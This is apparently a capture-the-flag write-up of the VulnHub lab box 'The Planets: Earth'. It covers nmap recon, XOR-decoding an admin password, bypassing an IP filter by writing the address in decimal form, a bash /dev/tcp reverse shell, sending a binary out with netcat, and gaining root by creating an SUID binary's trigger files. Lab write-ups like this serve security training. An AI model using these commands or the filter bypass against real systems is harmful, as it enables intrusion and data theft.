This is THE PLANETS: EARTH from VulnHub.

Difficulty: Easy

Earth is an easy box though you will likely find it more challenging than “Mercury” in this series and on the harder side of easy, depending on your experience.

Let’s go.

PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 8.6 (protocol 2.0)
| ssh-hostkey: 
|   256 5b:2c:3f:dc:8b:76:e9:21:7b:d0:56:24:df:be:e9:a8 (ECDSA)
|_  256 b0:3c:72:3b:72:21:26:ce:3a:84:e8:41:ec:c8:f8:41 (ED25519)
80/tcp  open  http     Apache httpd 2.4.51 ((Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9)
|_http-title: Bad Request (400)
|_http-server-header: Apache/2.4.51 (Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9
443/tcp open  ssl/http Apache httpd 2.4.51 ((Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9)
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: Test Page for the HTTP Server on Fedora
| ssl-cert: Subject: commonName=earth.local/stateOrProvinceName=Space
| Subject Alternative Name: DNS:earth.local, DNS:terratest.earth.local
| Not valid before: 2021-10-12T23:26:31
|_Not valid after:  2031-10-10T23:26:31
|_ssl-date: TLS randomness does not represent time
|_http-server-header: Apache/2.4.51 (Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9
| tls-alpn: 
|_  http/1.1
MAC Address: 08:00:27:32:4F:91 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.6
Network Distance: 1 hop

Lemme highlight a line from the above nmap output:

DNS:earth.local, DNS:terratest.earth.local

Add these to /etc/hosts, and we enumerate. Note we’ve got HTTP and HTTPS.

Here: https://terratest.earth.local/robots.txt we find one interesting entry:

Disallow: /testingnotes.*

https://terratest.earth.local/testingnotes.txt:

Testing secure messaging system notes:
*Using XOR encryption as the algorithm, should be safe as used in RSA.
*Earth has confirmed they have received our sent messages.
*testdata.txt was used to test encryption.
*terra used as username for admin portal.
Todo:
*How do we send our monthly keys to Earth securely? Or should we change keys weekly?
*Need to test different key lengths to protect against bruteforce. How long should the key be?
*Need to improve the interface of the messaging interface and the admin panel, it’s currently very basic.

At http://earth.local/ we find Earth Secure Messaging Service with some existing messages, including the very first one:

2402111b1a0705070a41000a431a000a0e0a0f04104601164d050f070c0f15540d1018000….etc

Since we know it is XOR with testdata.txt we can reverse it, we get the file at https://terratest.earth.local/testdata.txt which says:

According to radiometric dating estimation and other evidence, Earth formed over 4.5 billion years ago. Within the first billion years of Earth’s history, life appeared in the oceans and began to affect Earth’s atmosphere and surface, leading to the proliferation of anaerobic and, later, aerobic organisms. Some geological evidence indicates that life may have arisen as early as 4.1 billion years ago.

So our recipe is decode from hex then XOR with the key above and we get:

earthclimatechangebad4humans

Now what? We have an /admin portal at http://earth.local/admin/ where we can login with terra:earthclimatechangebad4humans, and we get an admin CLI tool. We can run system commands with this, but trying anything with an IP in it (like a shell) prompts the error:

Remote connections are forbidden.

We can encode our IP as decimal (e.g. here) and my local IP 192.168.1.210 becomes 3232235986, which does not trip the filter; we can get a shell in this manner, e.g.

bash -i >& /dev/tcp/3232235986/1234 0>&1

Gets me:

┌──(root💀kali)-[/opt/vulnhub/earth]
└─# nc -lnvp 1234
listening on [any] 1234 ...
connect to [192.168.1.210] from (UNKNOWN) [192.168.1.125] 43052
bash: cannot set terminal process group (834): Inappropriate ioctl for device
bash: no job control in this shell
bash-5.1$ 

Root

Enumerating the local filesystem reveals an unusual SUID binary:

-rwsr-xr-x. 1 root root 24K Oct 12 22:18 /usr/bin/reset_root (Unknown SUID binary)

We have strings, and it appears to reset the root password under certain conditions:

bash-5.1$ strings /usr/bin/reset_root
strings /usr/bin/reset_root
/lib64/ld-linux-x86-64.so.2
setuid
puts
system
access
__libc_start_main
libc.so.6
GLIBC_2.2.5
__gmon_start__
H=@@@
paleblueH
]\UH
credentiH
als rootH
:theEartH
hisflat
[]A\A]A^A_
CHECKING IF RESET TRIGGERS PRESENT...
RESET TRIGGERS ARE PRESENT, RESETTING ROOT PASSWORD TO: Earth
/usr/bin/echo 'root:Earth' | /usr/sbin/chpasswd
RESET FAILED, ALL TRIGGERS ARE NOT PRESENT.
# snipped

I exfiltrate the file with netcat:

bash-5.1$ nc -w 3 192.168.1.210 9999 < reset_root

and

┌──(root💀kali)-[/opt/vulnhub/earth]
└─# nc -lnvp 9999 > reset_root                                                            
listening on [any] 9999 ...
connect to [192.168.1.210] from (UNKNOWN) [192.168.1.125] 57646

Running ltrace (not on the system) reveals the preconditions:

┌──(root💀kali)-[/opt/vulnhub/earth]
└─# ltrace ./reset_root
puts("CHECKING IF RESET TRIGGERS PRESE"...CHECKING IF RESET TRIGGERS PRESENT...
)                                                         = 38
access("/dev/shm/kHgTFI5G", 0)                                                                      = -1
access("/dev/shm/Zw7bV9U5", 0)                                                                      = -1
access("/tmp/kcM0Wewe", 0)                                                                          = -1
puts("RESET FAILED, ALL TRIGGERS ARE N"...RESET FAILED, ALL TRIGGERS ARE NOT PRESENT.
)                                                         = 44
+++ exited (status 0) +++

We can fix that:

bash-5.1$ touch /dev/shm/kHgTFI5G
touch /dev/shm/kHgTFI5G
bash-5.1$ touch /dev/shm/Zw7bV9U5
touch /dev/shm/Zw7bV9U5
bash-5.1$ touch /tmp/kcM0Wewe
touch /tmp/kcM0Wewe
bash-5.1$ /usr/bin/reset_root
/usr/bin/reset_root
CHECKING IF RESET TRIGGERS PRESENT...
RESET TRIGGERS ARE PRESENT, RESETTING ROOT PASSWORD TO: Earth
bash-5.1$ su root
su root
Password: Earth

[root@earth tmp]# id;hostname;date
id;hostname;date
uid=0(root) gid=0(root) groups=0(root)
earth
Tue Nov  9 10:09:36 UTC 2021
[root@earth tmp]#

And we are done. Not bad, not bad.